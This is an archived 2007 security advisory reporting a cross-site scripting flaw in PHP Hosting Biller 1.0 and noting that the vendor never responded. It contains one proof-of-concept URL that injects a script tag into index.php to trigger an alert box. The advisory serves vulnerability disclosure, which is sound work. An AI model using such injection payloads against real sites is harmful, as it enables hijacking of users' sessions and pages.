what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phb10-xss.txt

phb10-xss.txt
Posted Jun 20, 2007
Site serapis.net

PHP Hosting Biller version 1.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss
SHA-256 | 7e237f155c2757d24d19d980e4a283173fa888e2c6f77f59c9789af664d74eb8

phb10-xss.txt

Change Mirror Download
Application: PHP HOSTING BILLER
Web Site: http://www.jnshosts.com/php_hosting_biller.php
Versions: 1.0
Platform: linux, windows, freebsd, sun
Bug: Cross site Scripting (XSS)
Fix Available: No

-------------------------------------------------------

1) Introduction
2) Bug
3) The Code
4) Fix
5) About Serapis
6) Disclaimer

===========
1) Introduction
===========

"Php Hosting Biller 1.0 is software that allows you to manage webhosting clients,
Adding new clients, Automation of your webhosting ordering system.
It has a number of features."

======
2) Bug
======

Cross Site Scripting.

===============
3) Proof of concept.
===============

example:

http://www.example.com/app_path/index.php/%3E%22%3E%3CScRiPt%3Ealert(1234)%3C/ScRiPt%3E

=====
4) Fix
=====

The Author Was notified but never responded.

============
5) About Serapis.net
============

www.Serapis.net - is a portal dedicated to monitoring web defacements,
tracking defacements around the world 24/7.
serapis is the R&D Site of Secure Vision.

==========
6) Disclaimer
==========

The information within this paper may change without notice.
Use of this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever arising out
of or in connection with the use or spread of this information.
Any use of this information is at the user's own risk.

http://www.serapis.net - Web Site.
http://calima.serapis.net/blogs/ - Web defacements blog.
http://www.secvsn.com - SecureVision Web Site
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close